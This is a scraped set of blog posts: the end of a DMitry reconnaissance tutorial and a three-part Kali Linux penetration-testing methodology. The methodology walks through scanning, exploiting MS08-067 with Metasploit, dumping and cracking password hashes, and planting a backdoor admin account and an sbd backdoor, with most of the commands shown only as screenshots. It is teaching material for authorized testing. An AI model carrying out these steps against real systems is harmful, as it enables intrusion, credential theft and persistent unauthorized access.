<div class="MsoNoSpacing">
Ex – dmitry –s alexa.com</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-U2pMMbPi35Y/UePNQCU06jI/AAAAAAAAA_c/stZe-WEZNc8/s1600/4.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://2.bp.blogspot.com/-U2pMMbPi35Y/UePNQCU06jI/AAAAAAAAA_c/stZe-WEZNc8/s400/4.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
5. <b>–p</b> – This command is used to perform a TCP port scan on a host.</div>
<div class="MsoNoSpacing">
Syntax – dmitry –p IP address</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – dmitry –p 192.168.71.128</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-YmiM4fVauuI/UePNLnVaf1I/AAAAAAAAA_E/vksTdPTBGkI/s1600/5.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="http://4.bp.blogspot.com/-YmiM4fVauuI/UePNLnVaf1I/AAAAAAAAA_E/vksTdPTBGkI/s400/5.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
6. <b>–f</b>
– This command is used to perform a TCP port scan on a host showing
output reporting filtered ports (useful if there is a firewall in
place). For running successfully this command <b>-p</b> must be set.</div>
<div class="MsoNoSpacing">
Syntax – dmitry –pf domain</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – dmitry –pf google.com</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-0ahd_UK-y4E/UePNP9mW40I/AAAAAAAAA_Y/6-aEugz6CKA/s1600/6.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="325" src="http://1.bp.blogspot.com/-0ahd_UK-y4E/UePNP9mW40I/AAAAAAAAA_Y/6-aEugz6CKA/s400/6.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
7. <b>–b</b>
– This command is used to report to you a banner received from a
scanned port (Note this will only work if the port sends us a banner
when scanned). For running successfully this command <b>-p</b> must be set.</div>
<div class="MsoNoSpacing">
Syntax – dmitry –pb IP address</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – dmitry –pb 192.168.71.128</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-iKEhe7KWRh0/UePNSUNL2ZI/AAAAAAAAA_o/my3b-xlayds/s1600/7.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="http://3.bp.blogspot.com/-iKEhe7KWRh0/UePNSUNL2ZI/AAAAAAAAA_o/my3b-xlayds/s400/7.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
8.<b> –e</b> – This command is used to perform a search for possible email addresses.</div>
<div class="MsoNoSpacing">
Syntax – dmitry –e domain</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – dmitry –e facebook.com</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-0l44yJpLW7A/UePNXmFxV0I/AAAAAAAAA_8/f9If64IzoK0/s1600/7a.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="http://4.bp.blogspot.com/-0l44yJpLW7A/UePNXmFxV0I/AAAAAAAAA_8/f9If64IzoK0/s400/7a.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
9. <b>–n </b>– This command is used to give us Netcraft.com information on a host.</div>
<div class="MsoNoSpacing">
Syntax – dmitry –n domain</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Ex – dmitry –n alexa.com</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-2RRcL0A_d7Y/UePNSrKI26I/AAAAAAAAA_s/kdf7muWfEeo/s1600/7b.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="http://1.bp.blogspot.com/-2RRcL0A_d7Y/UePNSrKI26I/AAAAAAAAA_s/kdf7muWfEeo/s400/7b.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
10.<b> –o</b>
– This command is used to save output specify with a given name our
output the default is host.txt you could name it anything you want.</div>
<div class="MsoNoSpacing">
Syntax – dmitry –s domain –o filename</div>
<div class="MsoNoSpacing">
Ex – dmitry –s google.com –o filename </div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNoSpacing">
Here , <b>-s</b> is just a command you can also use other commands and save it on a text file. You can write your own name as filename.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-hANDLV9zDJ8/UePNUtdXskI/AAAAAAAAA_0/kRLKTmCR2BI/s1600/8.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="http://4.bp.blogspot.com/-hANDLV9zDJ8/UePNUtdXskI/AAAAAAAAA_0/kRLKTmCR2BI/s400/8.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
11. Here we are going to run some usefull commands together .</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-DnckyyAaAqg/UePNC-KXnrI/AAAAAAAAA-c/QsFU_gqPoeU/s1600/11.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="http://3.bp.blogspot.com/-DnckyyAaAqg/UePNC-KXnrI/AAAAAAAAA-c/QsFU_gqPoeU/s400/11.JPG" width="400" /></a></div>
<div style="text-align: center;">
<a href="http://4.bp.blogspot.com/-enWF1wWPeBU/UePM8yLiGqI/AAAAAAAAA-M/GHnsjz_Irio/s1600/12.JPG" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="216" src="http://4.bp.blogspot.com/-enWF1wWPeBU/UePM8yLiGqI/AAAAAAAAA-M/GHnsjz_Irio/s400/12.JPG" width="400" /></a></div>
<div style="text-align: center;">
<a href="http://1.bp.blogspot.com/-bfcaMp3M_7I/UePM_Sa0Y0I/AAAAAAAAA-U/ekZgVnnHaHI/s1600/13.JPG" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="188" src="http://1.bp.blogspot.com/-bfcaMp3M_7I/UePM_Sa0Y0I/AAAAAAAAA-U/ekZgVnnHaHI/s400/13.JPG" width="400" /></a></div>
<div style="text-align: center;">
<a href="http://4.bp.blogspot.com/-7dkkO55pOO4/UePNEuWzxdI/AAAAAAAAA-s/gKqbTJVc1SQ/s1600/14.JPG" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="186" src="http://4.bp.blogspot.com/-7dkkO55pOO4/UePNEuWzxdI/AAAAAAAAA-s/gKqbTJVc1SQ/s400/14.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i><b><span style="font-size: xx-small;">(click on image for large view)</span></b></i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><b><span style="font-size: xx-small;"> </span></b></i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><b><span style="font-size: xx-small;">Hope you liked it stay tuned for more updates :) </span></b></i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><b></b></i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><b><span style="font-size: xx-small;"></span></b></i><i><b><span style="font-size: xx-small;"> </span></b></i><i><b><span style="font-size: xx-small;"></span></b></i></div>
</div>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com33tag:blogger.com,1999:blog-4509349481580895365.post-71255245929861476952015-08-27T10:02:00.001+05:302015-08-27T10:02:08.772+05:30Pentesting Methodology Tutorial part -3<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends<br />
<br />
welcome to the third part of tutorial:<br />
<br />
<h3>
Planning</h3>
We begin in the planning phase of our methodology. If you are working
on a larger engagement and need a collaborative solution then Dradis is
the tool of choice. It provides capabilities for centralized
documentation, team collaboration, and most importantly the ability to
import information from our various tools within Kali. There are two
versions of Dradis: a community version and a commercial version. As you
can guess the version on Kali is the community version.<br />
Lets run through a quick example and fire up Dradis to create our
project structure. When you first launch Dradis you will be greeted with
an initialization screen. Give the server a password and select the
option to create a new project.<br />
<img alt="dradis" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2548128991-png/Blog_Images/dradis.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
Once you login with no username and the server password you will be
dropped into the Dradis framework console. From there we will implement
our penetration testing methodology and plan by adding branches and
notes. Since we have a lot to cover I will leave it up to the reader to
research more on Dradis.<br />
Within a few minutes we have mapped out our project tasks, Rules of Engagement, objectives, and remaining methodology steps.<br />
<img alt="scope" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2548129001-png/Blog_Images/scope.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
Dradis is a great tool, but don’t expect it to be a full-fledged
project management suite. If you need more firepower don’t forget that
Kali has a number of pre-installed applications such as Ruby and MySQL.
With this in mind you’re a few steps away from setting up Redmine to add
resource planning and Gantt charts to your Kali instance.<br />
Now that we have our project planning and documentation mechanism in
place we can move on to the next phase of the penetration testing
methodology and that's discovery.<br />
<h3>
Discovery</h3>
We decide to kick-off the Discovery phase by running TheHarvester.
TheHarvester is written by Christian and allows us to collect
information about a target organization from a variety of sources
including Google, Facebook, LinkedIn, spoke, etc. Let’s take a look at
the TheHarvester a bit closer.<br />
<img alt="theharvester1" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2568862965-png/Blog_Images/theharvester1.png?t=1440522756112&width=596" style="display: block; margin-left: auto; margin-right: auto; width: 596px;" width="596" /><br />
The screenshot shows TheHarvester options and some example usage. In
the next example we'll run TheHarvester against our target domain
querying Bing. We also want to ensure we limit our return results to
100. The command and its output would look something like:<br />
<img alt="theharvester2" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398114-png/Blog_Images/theharvester2.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
With these options selected TheHarvester will query Bing for our
domain looking for email addresses as well as additional linked domains.
The -n -t options tells TheHarvester to perform reverse DNS lookups on
the IP range identified for the domain queried as well as expand the
search for our domain across all top level domains. For example, if out
domain was nbc.com it would attempt for find domains such as nbc.ca,
nbc.biz, etc.<br />
TheHarvester can pull together a significant amount of information
that we can use during the scanning phase of Discovery, but in this case
we decide to utilize some additional tools to further our Information
Gathering efforts prior to moving on to scanning.<br />
At this point we decide that we want to interrogate DNS a bit more
with the information gathered from TheHarvester. Because of its features
we have choose to run our domains through Fierce. Fierce can initiate
DNS zone transfer attempts as well perform bruteforce lookups against
DNS. While TheHarvester can perform DNS bruteforcing as well, Fierce
contains added functionality and more granular options such as
controlling the number of threads used for execution. Here are the
Fierce options along with the output from our target domain. Please note
that the output here may not be ideal given our test domain that we are
using for this example.<br />
<img alt="theharvester3" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398124-png/Blog_Images/theharvester3.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
With this information in hand we can now import the output from the
tools into Dradis and move on to scanning, enumerating services, and
vulnerability identification.<br />
Once we have the completed Information Gathering we need to start
enumerating discovered networks and services. Kali again saves the day
by giving us all the tools we need in one location. While in the normal
course if our engagements we would turn to nmap, we wanted to cover a
couple other lesser-known scanners starting with fping and hping3.<br />
So using our case study we now have discovered hosts within out
domain we will utilize fping to identify systems on our target network.<br />
<img alt="theharvester4" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2568862975-png/Blog_Images/theharvester4.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
Based on the output of fping we know that ICMP is enabled and that we
were able to enumerate our target network. Now we select one of our
hosts and perform a SYN scan with hping3.<br />
<img alt="theharvester5" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398164-png/Blog_Images/theharvester5.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
Using our list of services we can run nmap against the open ports to identify operating system and service versions.<br />
<img alt="theharvester6" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398179-png/Blog_Images/theharvester6.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
Next we are going to leverage nmap's vulnerability scanner to check
for SMB vulnerabilities on this host. First, let's quickly look at
nmap's scripting parameters.<br />
<img alt="theharvester7" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398174-png/Blog_Images/theharvester7.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
If you are interested you can take a look at the scripts supplied
with nmap. On Kali you can find them in /usr/share/nmap/scripts. After
doing a bit of searching we come across smb-check-vulns.<br />
<img alt="theharvester8" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398149-png/Blog_Images/theharvester8.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
After looking at nmap's documentation we find that this script can be
used to identify vulnerability conditions with SMB. We also learn that
we need to supply an unsafe flag to get it to fully run our scan, with
consequences in mind and more importantly permission to impact system
availability we run our scan.<br />
<img alt="theharvester9" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398189-png/Blog_Images/theharvester9.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
We have come to the end of this phase of Discovery. We now have
enough information to begin the attack phase of our penetration test
against our target environment.<br />
We have come to the end of this phase of Discovery. We now have
enough information to begin the attack phase of our penetration test
against our target environment.<br />
<h3>
Attack</h3>
<h3>
Gaining Access</h3>
Now that we have identified several vulnerabilities as well as the
likelihood of exploitation we decide to try and exploit the MS08-067
vulnerability identified with our nmap scan. We leverage the Metasploit
framework to begin our initial attack vector.<br />
Metasploit is very powerful and could be used for various phases
within our methodology. That being said Kali provides many options that
can be leveraged to meet our testing objectives. In this particular case
Metasploit provides a perfect vehicle to exploit this particular
vulnerability.<br />
Prior to launching Metasploit we need to startup the Postgres
database and the Metasploit server component. These are not configured
to startup on boot by default in Kali.<br />
<img alt="attack1" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558401497-png/Blog_Images/attack1.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
Next, we launch Metasploit console with the msfconsole command. After
doing an initial search we discover that Metasploit does have an
exploit for MS08-067. We configure the exploit with the bind shell
Meterpreter payload to make us work a bit harder for our objectives.
Once all the options are configured we run the exploit using the exploit
command.<br />
<img alt="attack2" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558406582-png/Blog_Images/attack2.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
Success! We have exploited our vulnerability and have gained access to our system.<br />
<h3>
System Browsing</h3>
Now we'd like to validate our access as well as upload additional tools to gather information and launch further attacks.<br />
<img alt="attack3" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558401492-png/Blog_Images/attack3.png?t=1440522756112&width=588" style="display: block; margin-left: auto; margin-right: auto; width: 588px;" width="588" /><br />
After confirming that we are running under the SYSTEM. We decide that
we should dump hashes in order to help with attacks against other
systems.<br />
<img alt="attack4" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558406537-png/Blog_Images/attack4.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
Once we have the hashes we can launch John on our Kali system to
crack the administrator password. On many networks the administrator
account password will be the same across all systems or groups of
systems so this will come in handy as we continue to exploit our target
network.<br />
<img alt="attack5" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558406542-png/Blog_Images/attack5.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
<h3>
Installing Additional Tools</h3>
Once we dump hashes we decide to upload some additional tools to
pivot and launch attacks from our compromised host. While we could
download our tool-kits using Meterpreter we wanted to demonstrate a
couple of additional ways to upload tools to our exploited host. In
order to continue we drop into a shell.<br />
<img alt="meter1" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558406612-png/Blog_Images/meter1.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
We decide to leverage Windows tftp.exe client to upload our tool-set.
We first need to start the tftp daemon on our Kali instance. In order
to do this we ran:<br />
<img alt="meter2" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558401517-png/Blog_Images/meter2.png?t=1440522756112&width=588" style="display: block; margin-left: auto; margin-right: auto; width: 588px;" width="588" /><br />
Once our tftp server started we downloaded sbd.exe as well as create
an administrator account, so we can get back into our target in the
future.<br />
<img alt="meter3" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558406572-png/Blog_Images/meter3.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
Next, we launch our backdoor using sbd.exe. Sbd is very similar to
Netcat however it allows us to encrypt our data channel with a shared
secret.<br />
<img alt="meter4" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558406607-png/Blog_Images/meter4.png?t=1440522756112&width=587" style="display: block; margin-left: auto; margin-right: auto; width: 587px;" width="587" /><br />
We then connect with the sdb client on our Kali machine.<br />
<img alt="meter5" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558401522-png/Blog_Images/meter5.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
Using this backdoor we can repeat our Discovery process to identify
additional hosts or networks and vulnerabilities. We can also use this
access to pivot and launch attacks until our objectives are met.<br />
<h3>
Reporting</h3>
Documentation is critical to the success of the penetration test.
This can be performed through screen-shots or tool output. Since we are
using Dradis we ensure that we output all tools to text or XML files as
well as take screen-shots where tool output is less efficient.<br />
Some tools provide self-documenting features. Take Metasploit for
instance. It provides a database that captures output from various tools
as you progress through your penetration test. In addition, Meterpreter
has the screenshot feature that allows us to take a screen capture of
the victim's desktop. Here is a screenshot from our previously
compromised host.<br />
<img alt="meter6" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562428264-png/Blog_Images/meter6.png?t=1440522756112&width=590" style="display: block; margin-left: auto; margin-right: auto; width: 590px;" width="590" /><br />
Once this data is input or imported into Dradis we can output reports
in HTML and Word documents. The screen shot below should give you the
idea.<br />
<img alt="kali1" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562428274-png/Blog_Images/kali1.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
<h3>
Conclusion</h3>
Kali is a valuable resource when performing penetration testing.
Sometimes the tools can seem a bit overwhelming. Leveraging a
methodology such as NIST 800-115 will bring some consistency and
continuity to your penetration tests.<br />
While we did not cover every tool on the distribution nor demonstrate
all mapped tools in our example we hope this brief introduction will
help you formulate a plan of attack when using Kali for penetration
testing</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com5tag:blogger.com,1999:blog-4509349481580895365.post-10526071130125620702015-08-27T09:59:00.001+05:302015-08-27T09:59:59.796+05:30Pentesting Methodology Tutorial part 2<div dir="ltr" style="text-align: left;" trbidi="on">
HI friends<br />
<br />
welcome to the second part of methodology plan :<br />
<br />
<h3>
Attack</h3>
If you have done your homework during the Discovery phase then
hopefully the initial part of the Attack phase will go smoothly and
successfully. In this section we are going to map all the Kali tools to
the different parts of the Attack phase of NIST 800-115.<br />
Here is a summary of the Attack phase and its various parts. Keep in
mind that we will continue to revisit the Discovery phase throughout the
course of the penetration test.<br />
<h3>
<b>Gaining Access</b></h3>
Kali has several tools that can assist with gaining access to systems
and networks. Most people, includiing us, will immediately launch
Metasploit however there are several other tools-sets that can be
leveraged. To make things a bit more straight forward we have broken
these tools-sets out based on various attack vectors.<br />
<h3>
Password Attacks</h3>
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>Hydra/gtk-hydra</td>
<td>Network logon cracker which support many different services.</td>
</tr>
<tr>
<td>Dbpwaudit</td>
<td>Is a Java tool that allows you to perform online audits of password quality for several database engines.</td>
</tr>
<tr>
<td>Cisco-audit-tool</td>
<td>Script which scans Cisco routers for common vulnerabilities</td>
</tr>
<tr>
<td>Onesixtyone</td>
<td>Is an SNMP scanner which utilizes a sweep technique to achieve very high performance.</td>
</tr>
<tr>
<td>Acccheck</td>
<td>Script for checking default logins on Windows.</td>
</tr>
<tr>
<td>John</td>
<td>Offline dictionary and brute-force cracking tool.</td>
</tr>
<tr>
<td>Ophcrack</td>
<td>Is a Windows Password cracker based on Rainbow Tables.</td>
</tr>
</tbody>
</table>
<br />
<h3>
Vulnerability Exploitation</h3>
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>Metasploit</td>
<td>Penetration testing and exploitation framework.</td>
</tr>
<tr>
<td>Searchsploit</td>
<td>Script used to search Exploit-DB exploits.</td>
</tr>
<tr>
<td>Social Engineering Toolkit</td>
<td>An open-source Python-driven tool aimed at penetration testing around Social-Engineering.</td>
</tr>
</tbody>
</table>
<br />
<h3>
Wireless Attacks</h3>
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Kali Tool /</b></i></span><span style="color: #f58220;"><i><b>Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>Aircrack-ng</td>
<td>A 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.</td>
</tr>
<tr>
<td>Fern</td>
<td>A Wireless security auditing and attack software program written
using the Python Programming Language and the Python Qt GUI library, the
program is able to crack and recover WEP/WPA/WPS keys and also run
other network based attacks on wireless or ethernet based networks</td>
</tr>
</tbody>
</table>
<br />
<h3>
Web Attacks</h3>
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>Browser Exploitation Framework (BeEF)</td>
<td>A penetration testing tool that focuses on the web browser.</td>
</tr>
<tr>
<td>Sqlninja</td>
<td>A tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.</td>
</tr>
<tr>
<td>Bbqsql</td>
<td>SQL injection exploitation tool.</td>
</tr>
</tbody>
</table>
<br />
<h3>
<b>Escalating Privilege</b></h3>
Once we have gained user level access to a system, 9 times out of 10
we want to escalate our privilege to gather more sensitive information
such as passwords or restricted data. We will usually perform some of
the same Discovery phase processes in order to identify and exploit
additional vulnerabilities. You will notice that we have repeated
several tools from previous tables however we have provided some
additional description that are more relevant to this phase of the
process.<br />
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>Unix-privesc-check</td>
<td>Unix-privesc-checker is a script that runs on Unix systems (tested on
Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find
misconfigurations that could allow local unprivilged users to escalate
privileges to other users or to access local apps (e.g. databases).</td>
</tr>
<tr>
<td>lynis</td>
<td>An auditing tool for Unix (specialists). It scans the system and available software, to detect security issues.</td>
</tr>
<tr>
<td>enum4linux</td>
<td>A tool for enumerating information from Windows and Samba systems.</td>
</tr>
<tr>
<td>Metasploit</td>
<td>Penetration testing and exploitation framework. Metasploit has several modules that can assist with privilege escalation.</td>
</tr>
<tr>
<td>Searchsploit</td>
<td>Script used to search Exploit-DB for local privilege escalation exploits.</td>
</tr>
</tbody>
</table>
<br />
<h3>
<b>System Browsing</b></h3>
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>windows-binaries</td>
<td>Folder in Kali with multiple windows exploits and binaries.</td>
</tr>
<tr>
<td>Sbd.exe</td>
<td>An encrypted version of netcat.</td>
</tr>
<tr>
<td>nc.exe</td>
<td>Netcat is a computer networking service for reading from and writing
to network connections using TCP or UDP. Netcat is designed to be a
dependable "back-end" device that can be used directly or easily driven
by other programs and scripts. At the same time, it is a feature-rich
network debugging and investigation tool, since it can produce almost
any kind of correlation you would need and has a number of built-in
capabilities.<br />
Netcat is often referred to as a "Swiss-army knife for TCP/IP". Its
list of features includes port scanning, transferring files, and port
listening, and it can be used as a backdoor.</td>
</tr>
<tr>
<td> Metasploit/ Meterpreter</td>
<td>Exploitation framework with additional modules to gather information once compromised.</td>
</tr>
</tbody>
</table>
<h3>
<b> </b></h3>
<h3>
<b>Install Additional Tools</b></h3>
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>atftpd</td>
<td>Linux TFTP daemon that can be used to upload and download files from target systems.</td>
</tr>
<tr>
<td>apache</td>
<td>Web server that can be used to deliver additional tools to compromised host.</td>
</tr>
</tbody>
</table>
<h3>
<b> </b></h3>
<h3>
Reporting</h3>
Lastly, we need to take all the data from various tools as well as
our manual observations and screen-shots to create a report. A typical
penetration test report will have two audiences. A non-technical
audience that needs enough details to understand the problem and make
management level decisions to address the risk (think resources and
budget) and the technical audience who will be responsible for
mitigating the findings.<br />
<table border=".5"><tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>Dradis</td>
<td>Open-source framework for sharing information during a penetration
test. Dradis allows you to output gathered information in HTML and Word.</td>
</tr>
<tr>
<td>MagicTree</td>
<td>MagicTree is a penetration tester productivity tool. It is designed
to allow easy and straightforward data consolidation, querying, external
command execution and (yeah!) report generation.</td></tr>
</tbody></table>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com2tag:blogger.com,1999:blog-4509349481580895365.post-8248610338936118232015-08-27T09:56:00.000+05:302015-08-27T09:56:23.122+05:30Pentesting Methodology Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
Hi Friends ,<br />
<br />
Today i wish to share about the pentesting methodology which i used to practice with the kali linux :<br />
<br />
<span class="hs_cos_wrapper hs_cos_wrapper_meta_field hs_cos_wrapper_type_rich_text" data-hs-cos-general-type="meta_field" data-hs-cos-type="rich_text" id="hs_cos_wrapper_post_body"></span><br />
<h3>
The Methodology</h3>
We can’t begin an article about mapping Kali to a penetration testing
methodology without first selecting the methodology. When it comes to
penetration testing methodologies you can basically narrow the field
down to three. These are:<br />
<ol>
<li>Open Source Security Testing Methodology Manual (OSSTMM): Series of
standard tests designed to deliver results as verified facts that
provide actionable information in order to strengthen security
operations.</li>
<li>Penetration Testing Execution Standard (PTES): Standard for penetration testing execution along with technical guidelines.</li>
<li>National Institute of Standards and Technology: Guide to Security
Testing and Assessment (NST 800-115): Guide for conducting technical
security assessments. Contains guidance on techniques and methods that
an assessor should use when performing an Information Security
Assessment.</li>
</ol>
While all three are good methodologies we find that PTES and NIST
800-115 provide a bit more flexibility during our penetration tests.
Also, the methodologies more closely align with what’s taught in
security course curriculum such as SANS. For this article we will be
using NIST 800-115. Both PTES and NIST are similar so it should be easy
to transition between the two. Also, the folks over at PTES have done a
fairly decent job mapping tools to the methodology.<br />
<br />
<br />
<span class="hs_cos_wrapper hs_cos_wrapper_meta_field hs_cos_wrapper_type_rich_text" data-hs-cos-general-type="meta_field" data-hs-cos-type="rich_text" id="hs_cos_wrapper_post_body"></span><br />
<h3>
Planning</h3>
The Planning Phase is where we begin and where we will experience our
first little roadblock. This phase is focused on tasks such as
establishing rules of engagement, objectives, task assignment, testing
management, and engagement tracking. If we break this down further we
can think in terms of project management and penetration testing
documentation.<br />
Kali provides a few tools that can be used for planning and
penetration testing documentation. Here is a quick rundown of the tools
as well as a brief description.<br />
<table border=".5" cellpadding="1" style="margin-left: auto; margin-right: auto;">
<tbody>
<tr>
<td>
<span style="color: #f58220;"><strong><em>Tool/Capability</em></strong></span><br />
</td>
<td>
<span style="color: #f58220;"><strong><em>Description</em></strong></span><br />
</td>
</tr>
<tr>
<td>
Dradis<br />
</td>
<td>
Open-source framework for sharing information during a penetration test.<br />
</td>
</tr>
<tr>
<td>
Keep-note<br />
</td>
<td>
Cross platform note taking application.<br />
</td>
</tr>
<tr>
<td>
* Redmine<br />
</td>
<td>
Open-source web-based project management tool.<br />
</td>
</tr>
</tbody>
</table>
<br />
<h3>
Discovery</h3>
The next step and one of the most important steps in the penetration
testing methodology is discovery. The interesting thing about discovery
is that its a constant cycle during a penetration test. You are
typically re-engaging the discovery phase within the Attack process to
perform privilege escalation or pivot and attack other systems until the
objectives have been met.<br />
The discovery phase consists of two parts. The first part is
information gathering and scanning. During this part of the engagement
the team identifies as much information about the company, people,
systems, services, and applications as possible. The second part is
